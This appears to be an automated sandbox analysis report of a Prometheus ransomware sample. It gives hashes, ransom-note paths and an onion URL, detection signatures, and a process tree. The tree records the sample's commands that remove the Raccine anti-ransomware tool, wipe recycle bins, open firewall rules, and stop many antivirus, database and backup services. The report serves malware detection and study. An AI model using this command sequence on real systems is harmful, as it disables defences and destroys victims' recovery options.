Analysis
-
max time kernel
134s -
max time network
135s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
02-06-2021 15:02
Static task
static1
Behavioral task
behavioral1
Sample
dd4eb8aa3371b7fd821a7a9730c924cf.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
dd4eb8aa3371b7fd821a7a9730c924cf.exe
Resource
win10v20210408
General
-
Target
dd4eb8aa3371b7fd821a7a9730c924cf.exe
-
Size
194KB
-
MD5
dd4eb8aa3371b7fd821a7a9730c924cf
-
SHA1
3e53f7bf7dcb8569aaf0f3a3bcf67bda4c01c054
-
SHA256
9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184
-
SHA512
12e760a59377632548f41bbdb98941a04c7d32b5d084f70b23db702dbeabb1e7a489df6d03af40da977a463150e4d144641fbc4640037e8858897a0509c9f356
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
prometheus
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
prometheus
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Blocklisted process makes network request 18 IoCs
flow pid Process 28 3764 mshta.exe 29 3764 mshta.exe 31 3764 mshta.exe 33 3764 mshta.exe 34 3764 mshta.exe 35 3764 mshta.exe 36 3764 mshta.exe 37 3764 mshta.exe 38 3764 mshta.exe 39 3764 mshta.exe 40 3764 mshta.exe 41 3764 mshta.exe 42 3764 mshta.exe 43 3764 mshta.exe 44 3764 mshta.exe 45 3764 mshta.exe 46 3764 mshta.exe 47 3764 mshta.exe -
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
description flow ioc HTTP URL 13 http://live.sysinternals.com/PsExec.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\MergeUpdate.tiff dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Deletes itself 1 IoCs
pid Process 6008 cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 3604 icacls.exe 3612 icacls.exe 3596 icacls.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 icanhazip.com -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 2164 net.exe -
Kills process with taskkill 48 IoCs
pid Process 3120 taskkill.exe 3148 taskkill.exe 3220 taskkill.exe 3252 taskkill.exe 3492 taskkill.exe 3532 taskkill.exe 3096 taskkill.exe 3204 taskkill.exe 3268 taskkill.exe 3444 taskkill.exe 3484 taskkill.exe 3508 taskkill.exe 3088 taskkill.exe 3380 taskkill.exe 3156 taskkill.exe 3196 taskkill.exe 3188 taskkill.exe 3212 taskkill.exe 3244 taskkill.exe 3284 taskkill.exe 3364 taskkill.exe 764 taskkill.exe 2464 taskkill.exe 3140 taskkill.exe 3236 taskkill.exe 3260 taskkill.exe 3292 taskkill.exe 3104 taskkill.exe 3128 taskkill.exe 3228 taskkill.exe 3372 taskkill.exe 3356 taskkill.exe 3500 taskkill.exe 3080 taskkill.exe 3276 taskkill.exe 3404 taskkill.exe 3436 taskkill.exe 3428 taskkill.exe 3468 taskkill.exe 3476 taskkill.exe 3556 taskkill.exe 1068 taskkill.exe 3112 taskkill.exe 3172 taskkill.exe 3180 taskkill.exe 3308 taskkill.exe 3452 taskkill.exe 3516 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1808 reg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4060 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe Token: SeDebugPrivilege 1068 taskkill.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeDebugPrivilege 3228 taskkill.exe Token: SeDebugPrivilege 3128 taskkill.exe Token: SeDebugPrivilege 2464 taskkill.exe Token: SeDebugPrivilege 3260 taskkill.exe Token: SeDebugPrivilege 3112 taskkill.exe Token: SeDebugPrivilege 3088 taskkill.exe Token: SeDebugPrivilege 764 taskkill.exe Token: SeDebugPrivilege 3104 taskkill.exe Token: SeDebugPrivilege 3120 taskkill.exe Token: SeDebugPrivilege 3188 taskkill.exe Token: SeDebugPrivilege 3236 taskkill.exe Token: SeDebugPrivilege 3244 taskkill.exe Token: SeDebugPrivilege 3180 taskkill.exe Token: SeDebugPrivilege 3140 taskkill.exe Token: SeDebugPrivilege 3156 taskkill.exe Token: SeDebugPrivilege 3428 taskkill.exe Token: SeDebugPrivilege 3172 taskkill.exe Token: SeDebugPrivilege 3148 taskkill.exe Token: SeDebugPrivilege 3220 taskkill.exe Token: SeDebugPrivilege 3372 taskkill.exe Token: SeDebugPrivilege 3532 taskkill.exe Token: SeDebugPrivilege 3484 taskkill.exe Token: SeDebugPrivilege 3500 taskkill.exe Token: SeDebugPrivilege 3508 taskkill.exe Token: SeDebugPrivilege 3436 taskkill.exe Token: SeDebugPrivilege 3468 taskkill.exe Token: SeDebugPrivilege 3452 taskkill.exe Token: SeDebugPrivilege 3356 taskkill.exe Token: SeDebugPrivilege 3212 taskkill.exe Token: SeDebugPrivilege 3444 taskkill.exe Token: SeDebugPrivilege 3364 taskkill.exe Token: SeDebugPrivilege 3096 taskkill.exe Token: SeDebugPrivilege 3080 taskkill.exe Token: SeDebugPrivilege 3276 taskkill.exe Token: SeDebugPrivilege 3308 taskkill.exe Token: SeDebugPrivilege 3292 taskkill.exe Token: SeDebugPrivilege 3404 taskkill.exe Token: SeDebugPrivilege 3268 taskkill.exe Token: SeDebugPrivilege 3380 taskkill.exe Token: SeDebugPrivilege 3556 taskkill.exe Token: SeDebugPrivilege 3284 taskkill.exe Token: SeDebugPrivilege 3516 taskkill.exe Token: SeDebugPrivilege 3492 taskkill.exe Token: SeDebugPrivilege 3204 taskkill.exe Token: SeDebugPrivilege 3476 taskkill.exe Token: SeDebugPrivilege 3252 taskkill.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2020 wrote to memory of 1068 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 30 PID 2020 wrote to memory of 1068 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 30 PID 2020 wrote to memory of 1068 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 30 PID 2020 wrote to memory of 1068 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 30 PID 2020 wrote to memory of 1760 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 32 PID 2020 wrote to memory of 1760 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 32 PID 2020 wrote to memory of 1760 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 32 PID 2020 wrote to memory of 1760 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 32 PID 2020 wrote to memory of 1808 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 33 PID 2020 wrote to memory of 1808 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 33 PID 2020 wrote to memory of 1808 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 33 PID 2020 wrote to memory of 1808 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 33 PID 2020 wrote to memory of 1516 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 34 PID 2020 wrote to memory of 1516 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 34 PID 2020 wrote to memory of 1516 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 34 PID 2020 wrote to memory of 1516 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 34 PID 2020 wrote to memory of 1684 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 38 PID 2020 wrote to memory of 1684 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 38 PID 2020 wrote to memory of 1684 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 38 PID 2020 wrote to memory of 1684 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 38 PID 2020 wrote to memory of 1172 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 39 PID 2020 wrote to memory of 1172 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 39 PID 2020 wrote to memory of 1172 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 39 PID 2020 wrote to memory of 1172 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 39 PID 2020 wrote to memory of 1512 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 42 PID 2020 wrote to memory of 1512 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 42 PID 2020 wrote to memory of 1512 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 42 PID 2020 wrote to memory of 1512 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 42 PID 2020 wrote to memory of 572 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 43 PID 2020 wrote to memory of 572 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 43 PID 2020 wrote to memory of 572 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 43 PID 2020 wrote to memory of 572 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 43 PID 2020 wrote to memory of 660 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 46 PID 2020 wrote to memory of 660 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 46 PID 2020 wrote to memory of 660 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 46 PID 2020 wrote to memory of 660 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 46 PID 2020 wrote to memory of 1896 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 75 PID 2020 wrote to memory of 1896 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 75 PID 2020 wrote to memory of 1896 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 75 PID 2020 wrote to memory of 1896 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 75 PID 2020 wrote to memory of 1780 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 49 PID 2020 wrote to memory of 1780 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 49 PID 2020 wrote to memory of 1780 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 49 PID 2020 wrote to memory of 1780 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 49 PID 2020 wrote to memory of 1984 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 52 PID 2020 wrote to memory of 1984 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 52 PID 2020 wrote to memory of 1984 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 52 PID 2020 wrote to memory of 1984 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 52 PID 2020 wrote to memory of 1620 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 53 PID 2020 wrote to memory of 1620 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 53 PID 2020 wrote to memory of 1620 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 53 PID 2020 wrote to memory of 1620 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 53 PID 2020 wrote to memory of 1892 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 55 PID 2020 wrote to memory of 1892 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 55 PID 2020 wrote to memory of 1892 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 55 PID 2020 wrote to memory of 1892 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 55 PID 2020 wrote to memory of 1784 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 57 PID 2020 wrote to memory of 1784 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 57 PID 2020 wrote to memory of 1784 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 57 PID 2020 wrote to memory of 1784 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 57 PID 2020 wrote to memory of 864 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 58 PID 2020 wrote to memory of 864 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 58 PID 2020 wrote to memory of 864 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 58 PID 2020 wrote to memory of 864 2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe 58 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" dd4eb8aa3371b7fd821a7a9730c924cf.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2020 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1808
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1684
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:1172
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1512
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:572
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:660
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1896
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1780
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1984
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1620
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:1892
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:1784
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:864
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y2⤵PID:688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵PID:1388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:1364
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y2⤵PID:1368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:268
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y2⤵PID:1624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵PID:1716
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:1796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:932
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵PID:1208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:804
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y2⤵PID:980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:1592
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:1056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:772
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:1084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:1884
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y2⤵PID:936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:564
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:1612
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y2⤵PID:1780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:1372
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:2116
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:1684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:2084
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y2⤵PID:2060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:2268
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:2104
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:1964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:2096
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:2172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:2320
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:2212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:2336
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2312
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y2⤵PID:2144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:2288
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:2132
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:2280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:2480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y2⤵PID:2356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:2440
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:2604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:2424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:2596
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:2432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:2580
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:2472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:2656
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y2⤵PID:2464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵PID:3032
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:2496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:2668
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:2948
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:2552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:3060
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y2⤵PID:2544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵PID:2680
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y2⤵PID:2536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:2960
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:2712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:3008
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y2⤵PID:2736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:2092
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:2720
-
